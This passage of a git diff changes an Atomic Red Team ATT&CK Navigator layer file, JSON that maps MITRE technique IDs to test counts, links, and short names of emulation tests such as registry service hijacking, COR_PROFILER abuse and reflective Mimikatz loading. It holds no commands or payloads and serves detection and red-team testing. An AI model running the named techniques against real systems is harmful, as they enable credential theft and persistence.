Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index f063bb64..1489d244 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":44,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":60,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":56,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View 